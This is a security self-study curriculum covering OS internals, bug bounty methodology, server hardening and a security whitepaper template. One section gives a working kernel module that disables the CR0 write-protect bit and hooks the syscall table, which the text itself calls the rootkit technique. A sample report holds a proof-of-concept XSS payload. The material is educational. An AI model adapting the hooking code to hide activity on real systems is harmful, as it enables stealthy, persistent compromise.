# PHASE 4: MONTHS 10–12 — THE SOVEREIGN HACKER
## *Live Infrastructure, Kernel Engineering, and Real-World Vulnerability Discovery*

---

## THE CENTRAL THESIS OF PHASE 4

> **Everything you built, you can now deploy. Everything you know, you can now weaponize.** Phase 4 is the integration phase. Your C knowledge builds a kernel module. Your Go knowledge runs production infrastructure. Your security knowledge hunts real bugs in real systems. The split between creator and hacker dissolves. They were always the same discipline.

---

### MONTH 10, WEEK 1–2: OPERATING SYSTEMS: THREE EASY PIECES (OSTEP)

**Read with this frame:** You have been using operating system services for 9 months — `fork`, `mmap`, `pthread_create`, socket syscalls. OSTEP explains how those services are *implemented* inside the kernel you're about to write a module for.

**Chapter: Processes — The Abstraction**

```
A process is the OS's abstraction of a running program.

Process Control Block (PCB) — what the kernel stores per process:
  - PID (process ID)
  - Process state (running, ready, blocked, zombie)
  - Program counter (where is the CPU in this process's code?)
  - CPU registers (the complete register state — saved/restored on context switch)
  - Memory maps (where is this process's code, heap, stack?)
  - Open file descriptors
  - Signal handlers
  - Parent PID
```

**The process state machine:**
```
Created → Ready ⇌ Running → Terminated
               ↕
           Blocked (waiting for I/O)
```

**Context switching** — how the OS multiplexes the CPU:
```
1. Timer interrupt fires (every ~4 ms with a 250 Hz tick, a common default)
2. CPU saves current process's registers to its PCB
3. Scheduler selects next process
4. CPU loads next process's registers from its PCB
5. Jump to next process's saved program counter
```

This is why concurrency bugs (race conditions, deadlocks) are hard: the context switch can happen at any instruction.
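A deterministic model makes the problem concrete. The sketch below treats `counter++` as three machine steps (load, add, store) and lets an explicit schedule decide which thread runs next. The `thread` type and `run` function are invented for this illustration; no real threads are involved.

```go
package main

import "fmt"

// thread models one execution context running `counter++` as three steps.
// reg is its private register, preserved across context switches.
type thread struct {
    reg int
    pc  int // 0 = load, 1 = add, 2 = store, 3 = done
}

// step runs exactly one instruction of t against the shared counter.
func (t *thread) step(counter *int) {
    switch t.pc {
    case 0:
        t.reg = *counter
    case 1:
        t.reg++
    case 2:
        *counter = t.reg
    }
    if t.pc < 3 {
        t.pc++
    }
}

// run executes two threads under a schedule. Each entry names the thread
// (0 or 1) that the scheduler lets run for one instruction.
func run(schedule []int) int {
    counter := 0
    threads := [2]thread{}
    for _, id := range schedule {
        threads[id].step(&counter)
    }
    return counter
}

func main() {
    fmt.Println("no preemption:    ", run([]int{0, 0, 0, 1, 1, 1}))
    fmt.Println("switch after load:", run([]int{0, 1, 1, 1, 0, 0}))
}
```

The first schedule yields 2. The second yields 1: thread 0 loaded the old value, was switched out, and later stored a stale result over thread 1's update. The same six instructions ran in both cases; only the switch point changed.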

**Chapter: Paging — The Mechanism**

```
Physical memory (RAM): actual silicon chips. One flat address space.
Virtual memory:       what each process sees. Each process gets its own private address space (48-bit virtual addresses on typical x86-64).

The page table maps virtual addresses → physical addresses:
  Virtual addr: 0x7ffd3a2c1b40 (process's stack)
  Page table entry: virtual page 0x7ffd3a2c1 → physical frame 0x4F800
  Physical addr: 0x4F800B40

TLB (Translation Lookaside Buffer): cache for page table lookups.
  Every memory access requires an address translation.
  Without TLB: every access also pays for a page table walk (one extra memory read per table level, up to four with x86-64 4-level paging).
  With TLB hit: translation is fast (cached).
```
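The translation in the example above is a shift, a lookup, and an OR. This sketch reproduces it with 4 KiB pages. A flat map stands in for the real multi-level table, and `pageTable`, `demoTable`, and `errPageFault` are names invented here.

```go
package main

import (
    "errors"
    "fmt"
)

const pageShift = 12 // 4 KiB pages: the low 12 bits are the offset within the page

// pageTable maps virtual page numbers to physical frame numbers.
// Real x86-64 tables are a multi-level tree; a map keeps the idea visible.
type pageTable map[uint64]uint64

var errPageFault = errors.New("page fault: no mapping for virtual page")

// translate splits the address, looks up the frame, and reattaches the offset.
func (pt pageTable) translate(vaddr uint64) (uint64, error) {
    vpn := vaddr >> pageShift
    offset := vaddr & (1<<pageShift - 1)
    frame, ok := pt[vpn]
    if !ok {
        return 0, errPageFault
    }
    return frame<<pageShift | offset, nil
}

// demoTable holds the single mapping used in the text.
var demoTable = pageTable{0x7ffd3a2c1: 0x4F800}

func main() {
    pa, err := demoTable.translate(0x7ffd3a2c1b40)
    fmt.Printf("physical: %#x (err: %v)\n", pa, err)

    _, err = demoTable.translate(0x1000) // unmapped page
    fmt.Println(err)
}
```

The offset `0xb40` passes through untouched; only the page number is replaced. An unmapped page produces the fault that, in a real process, the kernel turns into SIGSEGV.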

**Why paging matters for security:**

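ASLR randomizes the *virtual* base address of each memory region (stack, heap, shared libraries) every time a program starts. Paging is what makes this cheap: the kernel can place a region at any virtual address and build page table entries that point at whatever physical frames are free. Understanding paging explains *why* ASLR works and *why* information leaks defeat it: offsets within a region are fixed, so a single leaked pointer reveals the region's randomized base, and every other address in it follows by arithmetic.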

---

### MONTH 10, WEEK 3–4: LINUX KERNEL MODULE — SYSTEM CALL INTERCEPTION

**What a Kernel Module Is:**

A Linux Kernel Module (LKM) is compiled C code that is loaded into the running kernel. It runs with full kernel privileges (ring 0) and with no isolation from the rest of the kernel: the boundary that protects the kernel from a buggy userspace process does not apply. A bug in an LKM can panic the system or introduce a privilege escalation vulnerability.

```
Userspace:                    Kernel space:
─────────────────             ──────────────────────────────────────
Your program                  Linux kernel
  │                             │
  │  syscall (e.g., open())     │  sys_open() ← YOUR MODULE INTERCEPTS HERE
  ├────────────────────────────▶│
  │                             │  VFS layer
  │                             │  EXT4 driver
  │◀────────────────────────────│  returns file descriptor
```

**The minimal LKM skeleton:**

```c
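// syscall_logger.c
// Sketch for x86-64 on a 5.x kernel such as Ubuntu 22.04's 5.15. Newer kernels
// add hardening that can break this approach. Run it in a throwaway VM only.
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/kprobes.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#include <linux/uaccess.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("You");
MODULE_DESCRIPTION("System call logger");

// Pointer to the real sys_call_table
static unsigned long *syscall_table;

// On modern x86-64 kernels, syscall handlers receive a single pt_regs pointer
typedef asmlinkage long (*orig_openat_t)(
    const struct pt_regs *regs
);
static orig_openat_t orig_openat;

// kallsyms_lookup_name() has not been exported to modules since kernel 5.7.
// A common workaround: register a kprobe on it to learn its address.
typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);

static unsigned long lookup_symbol(const char *name) {
    struct kprobe kp = { .symbol_name = "kallsyms_lookup_name" };
    kallsyms_lookup_name_t lookup;

    if (register_kprobe(&kp) < 0)
        return 0;
    lookup = (kallsyms_lookup_name_t)kp.addr;
    unregister_kprobe(&kp);
    return lookup(name);
}

// Our replacement function
static asmlinkage long hooked_openat(const struct pt_regs *regs) {
    char filename[256];
    long len;
    
    // openat(dfd, filename, flags, mode): the filename pointer arrives in RSI.
    // strncpy_from_user does not NUL-terminate on truncation, so reserve a byte.
    len = strncpy_from_user(filename, (const char __user *)regs->si,
                            sizeof(filename) - 1);
    if (len > 0) {
        filename[len] = '\0';
        printk(KERN_INFO "[syscall_logger] openat: %s (pid=%d)\n",
               filename, current->pid);
    }
    
    // Call the original syscall
    return orig_openat(regs);
}

// write_cr0() refuses to clear the WP bit on recent kernels (the bit is pinned),
// so write the register directly.
static inline void write_cr0_raw(unsigned long val) {
    asm volatile("mov %0, %%cr0" : "+r"(val) : : "memory");
}

// Disable write protection so the read-only syscall table can be modified
static void disable_write_protection(void) {
    write_cr0_raw(read_cr0() & ~0x00010000UL);  // Clear WP bit (bit 16)
}

static void enable_write_protection(void) {
    write_cr0_raw(read_cr0() | 0x00010000UL);   // Set WP bit (bit 16)
}

static int __init syscall_logger_init(void) {
    // Find the syscall table address
    syscall_table = (unsigned long *)lookup_symbol("sys_call_table");
    if (!syscall_table) {
        printk(KERN_ERR "[syscall_logger] Could not find sys_call_table\n");
        return -ENOENT;
    }
    
    // Save original syscall
    orig_openat = (orig_openat_t)syscall_table[__NR_openat];
    
    // Replace with our hook
    disable_write_protection();
    syscall_table[__NR_openat] = (unsigned long)hooked_openat;
    enable_write_protection();
    
    printk(KERN_INFO "[syscall_logger] Module loaded. Hooking openat.\n");
    return 0;
}

static void __exit syscall_logger_exit(void) {
    // Restore original syscall
    disable_write_protection();
    syscall_table[__NR_openat] = (unsigned long)orig_openat;
    enable_write_protection();
    
    printk(KERN_INFO "[syscall_logger] Module unloaded.\n");
}

module_init(syscall_logger_init);
module_exit(syscall_logger_exit);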
```

```makefile
# Makefile
obj-m += syscall_logger.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```

```bash
make
sudo insmod syscall_logger.ko    # Load module
sudo dmesg | tail -20           # Watch kernel log
# Open any file: cat /etc/hostname
sudo dmesg | tail -5            # See: [syscall_logger] openat: /etc/hostname (pid=12345)
sudo rmmod syscall_logger       # Unload
```

**Why this connects to security:** Rootkits use exactly this technique to hide files, processes, and network connections. Syscall table hooking is how attackers persist in a compromised system. Understanding how to *write* a rootkit module means you can recognize and investigate one.

**Do this in a VM only.** A wrong pointer in kernel code panics the machine. Your DigitalOcean VPS is not for kernel module experiments — use VirtualBox locally.

---

### MONTH 11–12: LIVE BUG BOUNTY HUNTING — THE METHODOLOGY

**The mindset shift:** PortSwigger labs are controlled environments. The vulnerability is guaranteed to exist. HackerOne programs are live systems. The vulnerability might not exist. The scope might exclude the interesting endpoint. Someone might have reported it yesterday.

**The correct mental model:** You are not running a scanner. You are reading an application.

**Pre-hunting research (for every new target):**

```
Step 1: Understand the business
  What does this company actually do?
  What are their highest-value assets? (user data, payments, admin functions)
  What would a real attacker want to compromise?

Step 2: Read the program's policy carefully
  What is in scope? (domains, endpoints, apps)
  What is explicitly out of scope?
  What severity definitions do they use?
  What have they already rewarded? (Hacktivity public reports)

Step 3: Map the attack surface
  Subdomain enumeration (run Vigilante)
  Technology fingerprinting (Wappalyzer, HTTP headers, error messages)
  JavaScript analysis (find API endpoints, hidden parameters, JS secrets)
  Mobile app decompilation (if mobile apps are in scope)
  Archive analysis (Wayback Machine for old endpoints)
```

**The JavaScript analysis technique — high-yield:**

Modern SPAs (React, Vue, Angular, Next.js) put API endpoint definitions in their JavaScript bundles. These endpoints often have less security scrutiny than the main API.

```bash
# Download all JS files from a target:
# First, find them:
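curl -s https://target.com | grep -oE 'src="[^"]+\.js"' | sed 's/src="//;s/"//'

# Analyze with LinkFinder (finds endpoints in JS). It runs from a clone of its repo:
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt
python3 linkfinder.py -i https://target.com/static/main.chunk.js -o cli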

# What you're looking for:
# - /api/internal/  (internal endpoints exposed in frontend code)
# - /api/admin/     (admin endpoints)  
# - API keys hardcoded in JS (misconfiguration finding)
# - GraphQL endpoints (/graphql, /api/graphql)
# - WebSocket endpoints
```
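The core of endpoint discovery is a regex pass over the bundle text. The sketch below shows the idea with a deliberately narrow pattern that only catches quoted paths starting with `/api`, `/graphql`, or a version prefix such as `/v2`. It is not LinkFinder's pattern, which covers far more shapes, and `extractEndpoints` plus the sample bundle are invented for illustration.

```go
package main

import (
    "fmt"
    "regexp"
    "sort"
)

// endpointRe matches quoted strings that look like absolute API paths.
// Narrow on purpose: relative paths and full URLs are not covered.
var endpointRe = regexp.MustCompile("[\"'`](/(?:api|graphql|v[0-9]+)[A-Za-z0-9_/.-]*)[\"'`]")

// extractEndpoints returns the unique matching paths in sorted order.
func extractEndpoints(js string) []string {
    seen := map[string]bool{}
    var out []string
    for _, m := range endpointRe.FindAllStringSubmatch(js, -1) {
        if !seen[m[1]] {
            seen[m[1]] = true
            out = append(out, m[1])
        }
    }
    sort.Strings(out)
    return out
}

func main() {
    // Hypothetical fragment of a minified bundle.
    bundle := `fetch("/api/users/me");axios.get('/api/internal/flags');` +
        `const g="/graphql";fetch("/api/users/me");var img="/static/logo.png"`
    for _, e := range extractEndpoints(bundle) {
        fmt.Println(e)
    }
}
```

Deduplicating and sorting matters in practice: a real bundle repeats the same path dozens of times, and a stable list is easy to diff between deployments to spot newly added endpoints.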

**The manual testing loop for each endpoint:**

```
For every endpoint you find, ask:
1. What does this endpoint DO? Read it carefully.
2. What AUTHENTICATION does it require?
3. What PARAMETERS does it accept?
4. What TRUST does it extend? (Does it make outbound requests? SSRF.)
5. What STATE does it modify? (Race conditions, IDOR)
6. What DATA does it return? (Information disclosure)
7. What HAPPENS if I send unexpected input? (Injection, parser confusion)
```

**The chain mindset — from minor to critical:**

```
Step 1: Find a subdomain with a misconfigured CORS policy
  Allows: Access-Control-Allow-Origin: *
  Impact: Low (no credentials)

Step 2: Find that same subdomain has an XSS
  Impact: Medium (steals data on that subdomain only)

Step 3: Find that the main app's API accepts requests from that subdomain
  via CORS with credentials
  Impact: The XSS on the subdomain can make credentialed API requests to main app
  Combined impact: Critical (account takeover via XSS → CORS bypass)
```
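Steps 1 and 3 differ only in two response headers, which makes the triage easy to automate. The sketch below classifies what a server returned for a request sent with a given `Origin`. The category names are this example's own shorthand, not an official severity scale.

```go
package main

import "fmt"

// classifyCORS interprets the Access-Control-Allow-Origin and
// Access-Control-Allow-Credentials values returned for a request
// that was sent with the given Origin header.
func classifyCORS(allowOrigin, allowCredentials, origin string) string {
    switch {
    case allowOrigin == "*":
        // Browsers will not expose credentialed responses under a wildcard.
        return "wildcard"
    case allowOrigin == origin && allowCredentials == "true":
        // Scripts on this origin can read authenticated responses.
        return "credentialed"
    case allowOrigin == origin:
        return "origin-only"
    default:
        return "denied"
    }
}

func main() {
    sub := "https://blog.target.com" // hypothetical subdomain with the XSS

    // Step 1 of the chain: wildcard without credentials.
    fmt.Println(classifyCORS("*", "", sub))
    // Step 3 of the chain: main API trusts the subdomain with credentials.
    fmt.Println(classifyCORS(sub, "true", sub))
    // A server that ignores the origin entirely.
    fmt.Println(classifyCORS("", "", sub))
}
```

Only the `credentialed` result turns an XSS on the subdomain into authenticated reads against the main API, which is the link that lifts the chain from medium to critical.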

**Report writing — the discipline that gets bugs accepted:**

A well-written report gets triaged faster, gets higher severity ratings, and builds your reputation. Structure:

```markdown
## Summary
One sentence: what the vulnerability is, where it is, and what the impact is.

## Vulnerability Details
- Type: [e.g., Stored XSS]
- Endpoint: [exact URL]
- Parameter: [exact parameter name]
- Authentication required: [yes/no, what role]

## Steps to Reproduce
1. Log in as a normal user at https://target.com/login
2. Navigate to https://target.com/profile/edit
3. In the "display name" field, enter: <img src=x onerror=alert(document.domain)>
4. Click Save
5. Navigate to https://target.com/profile/[your-username]
6. Observe: alert dialog fires showing target.com domain

## Impact
Explain what a real attacker could do with this. Stored XSS allows:
- Session cookie theft when the cookie lacks HttpOnly (with HttpOnly set, the script can still act as the user from inside the page)
- Account takeover via password change form submission
- Malware distribution to all users who view the profile
- Data exfiltration via fetch() to attacker-controlled server

## Supporting Evidence
[Screenshots, Burp Suite request/response logs, video PoC]

## Suggested Remediation
Encode HTML special characters in user-supplied display name before rendering.
Use textContent instead of innerHTML in the frontend renderer.
Implement a Content Security Policy to limit script execution origins.
```

---

### MONTH 11–12: THE SAAS DEPLOYMENT — PRODUCTION INFRASTRUCTURE

**DigitalOcean VPS initial setup:**

```bash
# SSH in as root — first thing: lock it down
ssh root@YOUR_DROPLET_IP

# Create non-root user
adduser deploy
usermod -aG sudo deploy

# SSH key only — disable password auth
mkdir -p /home/deploy/.ssh
cp ~/.ssh/authorized_keys /home/deploy/.ssh/
chown -R deploy:deploy /home/deploy/.ssh
chmod 700 /home/deploy/.ssh
chmod 600 /home/deploy/.ssh/authorized_keys

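# Edit sshd_config:
nano /etc/ssh/sshd_config
# Set:
#   PermitRootLogin no
#   PasswordAuthentication no
#   PubkeyAuthentication yes
# Before restarting: from a second terminal, confirm that
# `ssh deploy@YOUR_DROPLET_IP` works, or you can lock yourself out.
sshd -t                  # Validate the config; prints nothing on success
systemctl restart sshd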

# Firewall
ufw allow OpenSSH
ufw allow 80/tcp
ufw allow 443/tcp
ufw enable
ufw status

# Automatic security updates
apt install unattended-upgrades
dpkg-reconfigure unattended-upgrades
```

**Docker Compose deployment stack:**

```yaml
# docker-compose.yml
version: '3.8'

services:
  app:
    build: ./app
    restart: unless-stopped
    environment:
      - DATABASE_URL=postgresql://app_user:${DB_PASSWORD}@db:5432/app_db
      - REDIS_URL=redis://:${REDIS_PASSWORD}@redis:6379
      - JWT_SECRET=${JWT_SECRET}
    depends_on:
      db:
        condition: service_healthy
      redis:
        condition: service_healthy
    networks:
      - internal
    # No port exposed externally — nginx proxies to it

  db:
    image: postgres:15-alpine
    restart: unless-stopped
    volumes:
      - postgres_data:/var/lib/postgresql/data
    environment:
      POSTGRES_DB: app_db
      POSTGRES_USER: app_user
      POSTGRES_PASSWORD: ${DB_PASSWORD}
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U app_user -d app_db"]
      interval: 10s
      timeout: 5s
      retries: 5
    networks:
      - internal
    # No port exposed externally

  redis:
    image: redis:7-alpine
    restart: unless-stopped
    command: redis-server --requirepass ${REDIS_PASSWORD}
    healthcheck:
      test: ["CMD", "redis-cli", "--no-auth-warning", "-a", "${REDIS_PASSWORD}", "ping"]
      interval: 10s
      timeout: 5s
      retries: 5
    networks:
      - internal

  nginx:
    image: nginx:alpine
    restart: unless-stopped
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf:ro
      - certbot_certs:/etc/letsencrypt:ro
      - certbot_www:/var/www/certbot:ro   # Lets nginx serve certbot's webroot challenge files
    depends_on:
      - app
    networks:
      - internal
      - external

  certbot:
    image: certbot/certbot
    volumes:
      - certbot_certs:/etc/letsencrypt
      - certbot_www:/var/www/certbot
    command: certonly --webroot -w /var/www/certbot -d yourdomain.com --email you@email.com --agree-tos

volumes:
  postgres_data:
  certbot_certs:
  certbot_www:

networks:
  internal:
    driver: bridge
    internal: true   # No external internet access from internal services
  external:
    driver: bridge
```

**The security architecture of this deployment:**
- `db` and `redis` are on the `internal` network only — no internet exposure
- `app` is on the `internal` network — no direct external access
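- Only `nginx` joins both `internal` and `external`, so it is the single ingress point; because `internal: true` blocks outbound traffic, `app` cannot call external services directly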
- Environment variables via `.env` file — no secrets in docker-compose.yml
- Health checks ensure dependencies are ready before app starts

**Nginx configuration with security headers:**

```nginx
server {
    listen 443 ssl http2;
    server_name yourdomain.com;

    ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256;

    # Security headers:
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-Frame-Options "DENY" always;
    add_header X-XSS-Protection "0" always;  # The legacy XSS auditor is deprecated; rely on CSP instead
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
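    # Keep the policy on one line: a header value must not contain line breaks.
    # A nonce has to be freshly generated for every response, which static nginx
    # config cannot do. If inline scripts need nonces, emit this header from the app.
    add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self'; img-src 'self' data:; font-src 'self'; connect-src 'self'; frame-ancestors 'none'" always;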

    location / {
        proxy_pass http://app:3000;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}

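server {
    listen 80;
    server_name yourdomain.com;

    # Let certbot's webroot challenge through over plain HTTP.
    # Requires the certbot_www volume mounted at /var/www/certbot in the nginx container.
    location /.well-known/acme-challenge/ {
        root /var/www/certbot;
    }

    location / {
        return 301 https://$server_name$request_uri;  # Force HTTPS
    }
}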
```

---

### THE SECURITY WHITEPAPER — STRUCTURE

Your Phase 4 capstone requires a published security whitepaper. This is not optional documentation. It demonstrates that you can reason about your own system's security posture — the defining skill of a security engineer.

```markdown
# Security Architecture Whitepaper — [Your SaaS Name]
## Version 1.0 — [Date]

## 1. Executive Summary
One page. What is the system? What is its threat model?
What are the highest-value assets? What security guarantees are claimed?

## 2. System Architecture
Diagram of all components and data flows.
Which components are in-scope for this whitepaper?

## 3. Threat Model
Attacker profiles:
  - External unauthenticated attacker
  - Authenticated user attempting privilege escalation
  - Compromised database (what does the attacker get?)
  - Compromised application server (what does the attacker get?)
  - Malicious insider

STRIDE analysis for each component:
  - Spoofing: How does the system verify identity?
  - Tampering: How does the system detect modification?
  - Repudiation: What is the audit trail?
  - Information Disclosure: What data is exposed where?
  - Denial of Service: What are rate limits and quotas?
  - Elevation of Privilege: What prevents horizontal/vertical privilege escalation?

## 4. Encryption Architecture
  - Data at rest: AES-GCM-256 (key derivation, IV management, storage)
  - Data in transit: TLS 1.3 (cipher suites, certificate management)
  - Key hierarchy: master key → file keys (explain each level)

## 5. Authentication and Authorization
  - Password hashing: Argon2id (parameters, rationale)
  - Session management: token format, storage, expiration, revocation
  - Authorization model: who can access what, how it's enforced

## 6. Security Controls Implemented
  - Content Security Policy (exact policy, rationale for each directive)
  - CORS policy
  - Rate limiting (endpoints, thresholds, enforcement mechanism)
  - Input validation (where applied, what rejected)
  - SQL injection prevention (parameterized queries, ORM usage)

## 7. Known Limitations and Accepted Risks
This section is what separates a genuine whitepaper from marketing.
What did you NOT implement? What assumptions does the security model require?

## 8. Incident Response Plan
How would you know if you were compromised?
What logs exist? Where are they?
What is the response procedure?
```
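Section 4 of the outline asks you to explain a key hierarchy of master key → file keys. One way that hierarchy can look in code is envelope encryption, sketched below with Go's standard library. This is an illustration under assumptions, not the required design: the function names are invented, the master key is generated in-process instead of coming from a secrets store, and no key derivation or rotation is shown.

```go
package main

import (
    "crypto/aes"
    "crypto/cipher"
    "crypto/rand"
    "errors"
    "fmt"
)

func newGCM(key []byte) (cipher.AEAD, error) {
    block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
    if err != nil {
        return nil, err
    }
    return cipher.NewGCM(block)
}

// seal encrypts plaintext and returns nonce || ciphertext || tag.
// A fresh random nonce is drawn on every call.
func seal(key, plaintext []byte) ([]byte, error) {
    gcm, err := newGCM(key)
    if err != nil {
        return nil, err
    }
    nonce := make([]byte, gcm.NonceSize())
    if _, err := rand.Read(nonce); err != nil {
        return nil, err
    }
    return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// open reverses seal and fails if the key is wrong or the data was modified.
func open(key, sealed []byte) ([]byte, error) {
    gcm, err := newGCM(key)
    if err != nil {
        return nil, err
    }
    n := gcm.NonceSize()
    if len(sealed) < n {
        return nil, errors.New("sealed data too short")
    }
    return gcm.Open(nil, sealed[:n], sealed[n:], nil)
}

// encryptFile draws a random per-file key, encrypts data with it, and wraps
// the file key under the master key. Only the wrapped key is stored.
func encryptFile(master, data []byte) (wrappedKey, ciphertext []byte, err error) {
    fileKey := make([]byte, 32)
    if _, err = rand.Read(fileKey); err != nil {
        return nil, nil, err
    }
    if ciphertext, err = seal(fileKey, data); err != nil {
        return nil, nil, err
    }
    if wrappedKey, err = seal(master, fileKey); err != nil {
        return nil, nil, err
    }
    return wrappedKey, ciphertext, nil
}

func decryptFile(master, wrappedKey, ciphertext []byte) ([]byte, error) {
    fileKey, err := open(master, wrappedKey)
    if err != nil {
        return nil, err
    }
    return open(fileKey, ciphertext)
}

func main() {
    master := make([]byte, 32)
    if _, err := rand.Read(master); err != nil {
        panic(err)
    }
    wrapped, ct, err := encryptFile(master, []byte("example file contents"))
    if err != nil {
        panic(err)
    }
    pt, err := decryptFile(master, wrapped, ct)
    fmt.Println(string(pt), err)

    ct[len(ct)-1] ^= 0x01 // flip one bit of the authentication tag
    _, err = decryptFile(master, wrapped, ct)
    fmt.Println("after tampering:", err)
}
```

The design choice worth defending in the whitepaper: rotating the master key only requires re-wrapping the small file keys, not re-encrypting every file, and a leaked file key exposes one file instead of all of them.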

---

# THE 12-MONTH DEPENDENCY GRAPH — EVERYTHING CONNECTED

```
MONTH 1                    MONTH 4                    MONTH 7                    MONTH 10
────────                   ────────                   ────────                   ─────────
C compilation pipeline ──▶ Go compilation model ──▶  ELF binary internals ──▶  Kernel compilation
         │                          │                          │                          │
Memory layout (stack/heap) ─────────┼─────────────────────────┼──────────────────────────┼──▶ LKM memory access
         │                          │                          │                          │
GDB debugging ─────────────────────┼─────────────────────────┼──────────────────────────┼──▶ Kernel debugging (dmesg)
         │                          │                          │
HTTP/TCP/TLS internals ─────────────┼──────────────────────────┼──▶ Protocol parsing vulns in CTF binaries
         │                          │                          │
Burp Suite (intercept/replay) ──────┼──────────────────────────┼──────────────────────────────▶ Live bounty recon
         │                          │                          │
XSS/SQLi/IDOR ──────────────────────┼──▶ SSRF/OAuth/Race cond ─┼──▶ Chained exploits ──────────▶ HackerOne reports
                                    │                          │
                            PostgreSQL (B-tree) ───────────────┼──▶ Atomic SQL for race cond defense
                                    │                          │
                            AES-GCM-256 implementation ────────┼──▶ Recognize crypto in Ghidra
                                    │                          │
                            Go concurrency (goroutines) ───────┼──▶ Vigilante fuzzer ──────────▶ Live bounty recon tool
                                                               │
                                                    NASM shellcode ─────────────────────────▶ ROP chain construction
                                                               │
                                                    Ghidra decompilation ──────────────────▶ Binary bug analysis
```

---

# THE FINAL RULE

Every time you write a DEVLOG entry answering **"how does this connect to what I learned before?"** — you are building the graph above in your own mind.

The graph is the skill. The individual topics are the nodes. The connections are what make you dangerous.

